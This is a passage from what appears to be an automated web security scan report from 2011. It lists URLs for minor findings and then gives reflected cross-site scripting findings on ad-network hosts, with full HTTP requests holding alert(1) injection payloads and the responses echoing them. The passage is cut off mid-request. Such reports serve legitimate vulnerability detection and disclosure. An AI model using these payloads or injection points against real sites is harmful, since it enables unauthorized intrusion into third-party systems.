14.31. http://kellwood.com/brand_images/koret.jpg

14.32. http://kellwood.com/brand_images/logo_adam.png

14.33. http://kellwood.com/brand_images/logo_babyphat.png

14.34. http://kellwood.com/brand_images/logo_blkdnm.png

14.35. http://kellwood.com/brand_images/logo_briggs.png

14.36. http://kellwood.com/brand_images/logo_davidmeister.png

14.37. http://kellwood.com/brand_images/logo_democracy.png

14.38. http://kellwood.com/brand_images/logo_jax.png

14.39. http://kellwood.com/brand_images/logo_jolt.png

14.40. http://kellwood.com/brand_images/logo_koret.png

14.41. http://kellwood.com/brand_images/logo_mymichelle.png

14.42. http://kellwood.com/brand_images/logo_phatfarm.png

14.43. http://kellwood.com/brand_images/logo_rebeccataylor.png

14.44. http://kellwood.com/brand_images/logo_rewind.png

14.45. http://kellwood.com/brand_images/logo_sagharbor.png

14.46. http://kellwood.com/brand_images/logo_sangria.png

14.47. http://kellwood.com/brand_images/logo_vince.png

14.48. http://kellwood.com/brand_images/logo_xoxo.png

14.49. http://kellwood.com/brand_images/mymichelle.jpg

14.50. http://kellwood.com/brand_images/phatfarm.jpg

14.51. http://kellwood.com/brand_images/rebeccataylor.jpg

14.52. http://kellwood.com/brand_images/rewind.jpg

14.53. http://kellwood.com/brand_images/sagharbor.jpg

14.54. http://kellwood.com/brand_images/sangria.jpg

14.55. http://kellwood.com/brand_images/vince.jpg

14.56. http://kellwood.com/brand_images/xoxo.jpg

14.57. http://kellwood.com/brand_text/text_adam.png

14.58. http://kellwood.com/brand_text/text_babyphat.png

14.59. http://kellwood.com/brand_text/text_blkdnm.png

14.60. http://kellwood.com/brand_text/text_briggs.png

14.61. http://kellwood.com/brand_text/text_davidmeister.png

14.62. http://kellwood.com/brand_text/text_democracy.png

14.63. http://kellwood.com/brand_text/text_jax.png

14.64. http://kellwood.com/brand_text/text_jolt.png

14.65. http://kellwood.com/brand_text/text_koret.png

14.66. http://kellwood.com/brand_text/text_mymichelle.png

14.67. http://kellwood.com/brand_text/text_phatfarm.png

14.68. http://kellwood.com/brand_text/text_rebeccataylor.png

14.69. http://kellwood.com/brand_text/text_rewind.png

14.70. http://kellwood.com/brand_text/text_sagharbor.png

14.71. http://kellwood.com/brand_text/text_sangria.png

14.72. http://kellwood.com/brand_text/text_vince.png

14.73. http://kellwood.com/brand_text/text_xoxo.png

14.74. http://kellwood.com/favicon.ico

14.75. http://kellwood.com/homeImageRoll.swf

14.76. http://kellwood.com/home_images/home1.jpg

14.77. http://kellwood.com/home_images/home2.jpg

14.78. http://kellwood.com/home_images/home5.jpg

14.79. http://kellwood.com/home_images/home6.jpg

14.80. http://kellwood.com/home_images/home7.jpg

14.81. http://kellwood.com/kwd_brands.swf

14.82. http://static.ak.connect.facebook.com/connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML

14.83. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

14.84. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US

14.85. http://www.facebook.com/connect/connect.php

14.86. http://www.facebook.com/connect/connect.php

14.87. http://www.facebook.com/connect/connect.php

14.88. http://www.facebook.com/connect/connect.php

14.89. http://www.facebook.com/connect/connect.php

14.90. http://www.facebook.com/connect/connect.php

14.91. http://www.facebook.com/connect/connect.php

14.92. http://www.facebook.com/connect/connect.php

14.93. http://www.facebook.com/connect/connect.php

14.94. http://www.facebook.com/connect/connect.php

14.95. http://www.facebook.com/connect/connect.php

14.96. http://www.facebook.com/connect/connect.php

14.97. http://www.facebook.com/connect/connect.php

14.98. http://www.facebook.com/extern/login_status.php

14.99. http://www.facebook.com/plugins/activity.php

14.100. http://www.facebook.com/plugins/activity.php

14.101. http://www.facebook.com/plugins/activity.php

14.102. http://www.facebook.com/plugins/activity.php

14.103. http://www.facebook.com/plugins/activity.php

14.104. http://www.facebook.com/plugins/activity.php

14.105. http://www.facebook.com/plugins/activity.php

14.106. http://www.facebook.com/plugins/activity.php

14.107. http://www.facebook.com/plugins/activity.php

14.108. http://www.facebook.com/plugins/activity.php

14.109. http://www.facebook.com/plugins/like.php

14.110. http://www.facebook.com/plugins/like.php

14.111. http://www.facebook.com/plugins/like.php

14.112. http://www.facebook.com/plugins/like.php

14.113. http://www.facebook.com/plugins/like.php

14.114. http://www.facebook.com/plugins/like.php

14.115. http://www.facebook.com/plugins/like.php

14.116. http://www.facebook.com/plugins/likebox.php

14.117. http://www.facebook.com/plugins/likebox.php

14.118. http://www.facebook.com/plugins/likebox.php

14.119. http://www.facebook.com/plugins/likebox.php

14.120. http://www.facebook.com/plugins/likebox.php

14.121. http://www.facebook.com/plugins/recommendations.php

14.122. http://www.facebook.com/plugins/recommendations.php

14.123. http://www.facebook.com/plugins/recommendations.php

14.124. http://www.facebook.com/plugins/recommendations.php

14.125. http://www.facebook.com/plugins/recommendations.php

14.126. http://www.facebook.com/plugins/recommendations.php

14.127. http://www.facebook.com/plugins/recommendations.php

14.128. http://www.facebook.com/plugins/recommendations.php

14.129. http://www.facebook.com/plugins/recommendations.php

14.130. http://www.facebook.com/plugins/recommendations.php

14.131. http://www.facebook.com/plugins/recommendations.php

14.132. http://www.facebook.com/plugins/recommendations.php

14.133. http://www.facebook.com/plugins/recommendations.php

14.134. http://www.foxnews.com/static/all/js/head.js

14.135. http://www.foxnews.com/static/fn2/ws/politics/js/simple_include/elections/elections.js

14.136. http://www.motivitycms.com/favicon.ico

14.137. http://www.motivitycms.com/images/150w.gif

14.138. http://www.motivitycms.com/images/ae-before-after.gif

14.139. http://www.motivitycms.com/images/arrow-bullet.gif

14.140. http://www.motivitycms.com/images/blue-gradient.gif

14.141. http://www.motivitycms.com/images/bookmark-icon.gif

14.142. http://www.motivitycms.com/images/bottom-footer-bg.jpg

14.143. http://www.motivitycms.com/images/bullet-blue.gif

14.144. http://www.motivitycms.com/images/careers-footer-nav.jpg

14.145. http://www.motivitycms.com/images/commerceEnabled.png

14.146. http://www.motivitycms.com/images/contact-footer-nav.jpg

14.147. http://www.motivitycms.com/images/customerBrocade.gif

14.148. http://www.motivitycms.com/images/customerSysco.gif

14.149. http://www.motivitycms.com/images/email-icon.gif

14.150. http://www.motivitycms.com/images/footer-bg.jpg

14.151. http://www.motivitycms.com/images/form-bg.jpg

14.152. http://www.motivitycms.com/images/go-bullet.jpg

14.153. http://www.motivitycms.com/images/google-web-optimzer.gif

14.154. http://www.motivitycms.com/images/iconDollarSign.gif

14.155. http://www.motivitycms.com/images/insidebkgrd.gif

14.156. http://www.motivitycms.com/images/link-list-bottom-border.jpg

14.157. http://www.motivitycms.com/images/link-list-top.jpg

14.158. http://www.motivitycms.com/images/logo-div-bg.jpg

14.159. http://www.motivitycms.com/images/natureair-screenshot.gif

14.160. http://www.motivitycms.com/images/nav/about.gif

14.161. http://www.motivitycms.com/images/nav/aboutOver.gif

14.162. http://www.motivitycms.com/images/nav/customers.gif

14.163. http://www.motivitycms.com/images/nav/customersOver.gif

14.164. http://www.motivitycms.com/images/nav/home.gif

14.165. http://www.motivitycms.com/images/nav/marketing-platform.gif

14.166. http://www.motivitycms.com/images/nav/marketing-platformOver.gif

14.167. http://www.motivitycms.com/images/nav/partners.gif

14.168. http://www.motivitycms.com/images/nav/partnersOver.gif

14.169. http://www.motivitycms.com/images/nav/services.gif

14.170. http://www.motivitycms.com/images/please-contact-me.gif

14.171. http://www.motivitycms.com/images/print-icon.gif

14.172. http://www.motivitycms.com/images/rightcolumn-shadow.gif

14.173. http://www.motivitycms.com/images/sign-up-btn.gif

14.174. http://www.motivitycms.com/images/support-footer-nav.jpg

15. Robots.txt file

15.1. http://appointron.com/

15.2. http://feeds.bbci.co.uk/news/rss.xml

15.3. http://fls.doubleclick.net/activityi

15.4. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1063327355/

15.5. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml

15.6. http://segment-pixel.invitemedia.com/pixel

15.7. http://www.google-analytics.com/__utm.gif

15.8. https://www.google.com/accounts/ServiceLogin

15.9. http://www.googleadservices.com/pagead/conversion/992540712/

16. HTML does not specify charset

16.1. http://ad.adsrvr.org/container/7j9i29e.1.html

16.2. http://ad.doubleclick.net/adi/fnc/root/stocksearch

16.3. http://ad.doubleclick.net/adi/wn.loc.wcax/community

16.4. http://ad.doubleclick.net/adi/wn.loc.wcax/homepage

16.5. http://ad.doubleclick.net/adi/wn.loc.wcax/mostpopular

16.6. http://ad.doubleclick.net/adi/wn.loc.wcax/news

16.7. http://ad.doubleclick.net/adi/wn.loc.wcax/news-ap-national

16.8. http://ad.doubleclick.net/adi/wn.loc.wcax/news-ap-state

16.9. http://ad.doubleclick.net/adi/wn.loc.wcax/political

16.10. http://ad.doubleclick.net/adi/wn.loc.wcax/promotion1

16.11. http://ad.doubleclick.net/adi/wn.loc.wcax/sales-lifestyle

16.12. http://ad.doubleclick.net/adi/wn.loc.wcax/weather

16.13. http://ad.yieldmanager.com/iframe3

16.14. http://ads.pointroll.com/PortalServe/

16.15. http://adserver.veruta.com/cookiematch.fcgi

16.16. http://altfarm.mediaplex.com/ad/js/1551-48114-17349-5

16.17. http://amch.questionmarket.com/adscgen/st.php

16.18. http://bs.serving-sys.com/BurstingPipe/adServer.bs

16.19. http://cplads.appspot.com/creatives/aio_300_250/GoogleForm_dp.html

16.20. http://fls.doubleclick.net/activityi

16.21. http://ftpcontent.worldnow.com/wcax/custom/branding_feature_i.html

16.22. http://hostedusa3.whoson.com/include.js

16.23. http://js.adsonar.com/js/pass.html

16.24. http://kellwood.com/homeImageFiles.asp

16.25. http://now.eloqua.com/visitor/v200/svrGP.aspx

16.26. http://odb.outbrain.com/utils/ping.html

16.27. http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom

16.28. http://tag.admeld.com/ad/iframe/3/foxnews/300x250/ros

16.29. http://tag.admeld.com/ad/iframe/3/foxnews/728x90/politics

16.30. http://tag.admeld.com/ad/iframe/3/foxnews/728x90/ros

16.31. http://tag.admeld.com/ad/iframe/3/foxnewsrtb/300x250/ros

16.32. http://tag.admeld.com/ad/iframe/3/foxnewsrtb/728x90/ros

16.33. http://tracking.placelocal.com/

16.34. http://w55c.net/ct/cms-2-frame.html

16.35. http://www.rss-info.com/rss2.php

16.36. http://www.wptz.com/esi/postcaching/getKAtoken.esi

17. Content type incorrectly stated

17.1. http://a0.twimg.com/profile_images/313260532/thurston_normal.gif

17.2. http://a1.interclick.com/getInPageJS.aspx

17.3. http://a1.interclick.com/getInPageJSProcess.aspx

17.4. http://a2.twimg.com/profile_images/1133407227/ugh_normal.jpg

17.5. http://a2.twimg.com/profile_images/313254997/carlson_normal.gif

17.6. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/779.0.js.88x31/517745

17.7. http://adadvisor.net/adscores/g.js

17.8. http://admeld.lucidmedia.com/clicksense/admeld/match

17.9. http://ads.adap.tv/beacons

17.10. http://adserver.veruta.com/cookiematch.fcgi

17.11. http://altfarm.mediaplex.com/ad/js/1551-48114-17349-5

17.12. http://amch.questionmarket.com/adscgen/st.php

17.13. http://api.kickapps.com/rest/comments/62976

17.14. http://api.twitter.com/1/WCAX_DAN/lists/wcaxweather/statuses.json

17.15. http://bh.contextweb.com/bh/sync/admeld

17.16. http://bs.serving-sys.com/BurstingPipe/adServer.bs

17.17. http://cdn.taboolasyndication.com/libtrc/hearst-wptz/rbox.en.4-6-12-44788.json

17.18. http://cdnserve.a-widget.com/service/getWidget2.kickAction

17.19. http://clientapps.kickapps.com/hearst/articleTitles.php

17.20. http://clientapps.kickapps.com/hearst/comments/cnr_100plus.php

17.21. http://clientapps.kickapps.com/hearst/comments/include.php

17.22. http://clientapps.kickapps.com/hearst/comments/start.php

17.23. http://hostedusa3.whoson.com/include.js

17.24. http://javadl-esd.sun.com/update/AU/map-2.0.3.1.xml

17.25. http://kellwood.com/homeImageFiles.asp

17.26. http://nexus.ensighten.com/IB/serverComponent.php

17.27. http://now.eloqua.com/visitor/v200/svrGP.aspx

17.28. http://s3.amazonaws.com/getsatisfaction.com/images/transparent.gif

17.29. http://server.iad.liveperson.net/hcp/html/mTag.js

17.30. http://spd.pointroll.com/PointRoll/Ads/PRScript.dll

17.31. http://tracking.placelocal.com/

17.32. http://trc.taboolasyndication.com/hearst-wptz/trc/2/json

17.33. http://www.acquisio.com/wp-content/themes/acquisio/images/favicon.ico

17.34. http://www.clickability.com/templates/Corp_Scripts_Template.js

17.35. http://www.clickability.com/templates/swfobject.js

17.36. http://www.foxnews.com/authentication/logout/submit

17.37. http://www.foxnews.com/favicon.ico

17.38. http://www.foxnews.com/ucat/images/291976_Jennifer121.jpg

17.39. http://www.foxnews.com/ucat/images/292526_partridges121.jpg

17.40. http://www.foxnews.com/ucat/images/292528_sucker-punch-vanessa-hudgens121.jpg

17.41. http://www.foxnews.com/weather/feed/getWeatherJsonP

17.42. http://www.internetrix.net/favicon.ico

17.43. http://www.internetrix.net/images/event_list_bg.gif

17.44. http://www.rss-info.com/rss2.php

17.45. http://www.vermontopia.com/custom/content_files/img_logo.gif

17.46. http://www.vermontopia.com/custom/content_files/noimage.gif

17.47. http://www.wptz.com/_public/js/ibLast.js

17.48. http://www.wptz.com/esi/postcaching/getKAtoken.esi

18. Content type is not specified

18.1. http://ad.yieldmanager.com/st

18.2. http://ads.bluelithium.com/st

18.3. http://ads.pointroll.com/PortalServe/

18.4. http://lfov.net/favicon.ico

18.5. http://lfov.net/webrecorder/g/chimera.js

18.6. http://lfov.net/webrecorder/js/listen.js

18.7. http://pcm2.map.pulsemgr.com/uds/pc

18.8. http://ulocal.wptz.com/service/isUserLoggedIn.kickAction

19. SSL certificate



1. Cross-site scripting (reflected)
There are 163 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://a.collective-media.net/adj/cm.foxnews/tier2_031010 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.foxnews/tier2_031010

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 43f3d'-alert(1)-'d25126b0b26 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.foxnews43f3d'-alert(1)-'d25126b0b26/tier2_031010;sz=300x250;ord=1302538878? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f3c48b4c0582b; JY57=3cSilT0yz8Xh8jOg0fJAMcgeFnMmtGSsZeOSn2prstLRXgYh65wKGKA

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 451
Vary: Accept-Encoding
Date: Mon, 11 Apr 2011 16:21:20 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 11-May-2011 16:21:20 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.foxnews43f3d'-alert(1)-'d25126b0b26/tier2_031010;sz=300x250;net=cm;ord=1302538878;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.2. http://a.collective-media.net/adj/cm.foxnews/tier2_031010 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.foxnews/tier2_031010

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 526b1'-alert(1)-'91a29197829 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.foxnews/tier2_031010526b1'-alert(1)-'91a29197829;sz=300x250;ord=1302538878? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f3c48b4c0582b; JY57=3cSilT0yz8Xh8jOg0fJAMcgeFnMmtGSsZeOSn2prstLRXgYh65wKGKA

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 451
Date: Mon, 11 Apr 2011 16:21:20 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 11-May-2011 16:21:20 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.foxnews/tier2_031010526b1'-alert(1)-'91a29197829;sz=300x250;net=cm;ord=1302538878;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.3. http://a.collective-media.net/adj/cm.foxnews/tier2_031010 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.foxnews/tier2_031010

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45a4e'-alert(1)-'a7de91708c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.foxnews/tier2_031010;sz=300x250;ord=1302538878?&45a4e'-alert(1)-'a7de91708c1=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f3c48b4c0582b; JY57=3cSilT0yz8Xh8jOg0fJAMcgeFnMmtGSsZeOSn2prstLRXgYh65wKGKA

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 455
Date: Mon, 11 Apr 2011 16:21:20 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 11-May-2011 16:21:20 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.foxnews/tier2_031010;sz=300x250;net=cm;ord=1302538878?&45a4e'-alert(1)-'a7de91708c1=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.4. http://a.collective-media.net/adj/cm.foxnews/tier2_031010 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.foxnews/tier2_031010

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc880'-alert(1)-'d086b252dc0 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.foxnews/tier2_031010;sz=300x250;ord=1302538878?cc880'-alert(1)-'d086b252dc0 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f3c48b4c0582b; JY57=3cSilT0yz8Xh8jOg0fJAMcgeFnMmtGSsZeOSn2prstLRXgYh65wKGKA

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 452
Date: Mon, 11 Apr 2011 16:21:20 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 11-May-2011 16:21:20 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.foxnews/tier2_031010;sz=300x250;net=cm;ord=1302538878?cc880'-alert(1)-'d086b252dc0;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.5. http://a.rfihub.com/sed [pa parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.rfihub.com
Path:   /sed

Issue detail

The value of the pa request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 88e8f'><script>alert(1)</script>2f874ec50da was submitted in the pa parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sed?w=300&h=250&re=12387&pv=0&ra=3525255080.7230796942021698&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBKgktkFKgTfjNO6X6lAfi7omAC6-TxYsCj9qbsyK3zOLcHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzoAGz7MfrA7IBDHd3dy53Y2F4LmNvbboBCjMwMHgyNTBfYXPIAQnaAS9odHRwOi8vd3d3LndjYXguY29tL0dsb2JhbC9jYXRlZ29yeS5hc3A_Qz0xODgzNpgC8hHAAgTIAs3vzw6oAwHoAxDoA9Qq6APnAvUDAAAARPUDIAAAAIAGo6es8NStl8O_AQ%2526num%253D1%2526sig%253DAGiWqtwsnfDOzRnIRJLXiZuNn2CCD9KiLg%2526client%253Dca-pub-2103553853082603%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre35252550824788e8f'><script>alert(1)</script>2f874ec50da&pb=&pc=&pd=&pg=&ct=1302352525508&co=false&ep=TaBSkAAO5vgK5T0lsAJ3YlpV74vOvScCMvR4kw&ri=4da052900ee6f8ae53d25b0277621&rs=&ai=9530&rt=10261&pe=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-2103553853082603%26output%3Dhtml%26h%3D250%26slotname%3D8163847123%26w%3D300%26lmt%3D1302370522%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%26dt%3D1302352522769%26bpp%3D3%26shv%3Dr20110330%26jsv%3Dr20110321-2%26correlator%3D1302352522793%26frm%3D0%26adk%3D2815960337%26ga_vid%3D983270927.1302352523%26ga_sid%3D1302352523%26ga_hid%3D1867116075%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1063%26bih%3D1038%26ref%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18963%26fu%3D0%26ifi%3D1%26dtd%3D103%26xpc%3DmxzeQN3016%26p%3Dhttp%253A%2F%2Fwww.wcax.com&pf= HTTP/1.1
Host: a.rfihub.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2103553853082603&output=html&h=250&slotname=8163847123&w=300&lmt=1302370522&flash=10.2.154&url=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Fcategory.asp%3FC%3D18836&dt=1302352522769&bpp=3&shv=r20110330&jsv=r20110321-2&correlator=1302352522793&frm=0&adk=2815960337&ga_vid=983270927.1302352523&ga_sid=1302352523&ga_hid=1867116075&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1038&ref=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Fcategory.asp%3FC%3D18963&fu=0&ifi=1&dtd=103&xpc=mxzeQN3016&p=http%3A//www.wcax.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
